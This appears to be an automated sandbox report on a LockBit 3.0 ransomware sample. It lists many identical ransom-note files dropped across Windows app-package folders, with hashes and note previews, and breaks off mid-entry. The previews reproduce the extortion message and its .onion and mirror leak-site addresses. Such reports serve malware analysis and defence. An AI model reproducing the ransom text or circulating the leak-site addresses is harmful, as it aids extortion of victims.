                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.7_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.7_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.7_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.7_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.7_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.7_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
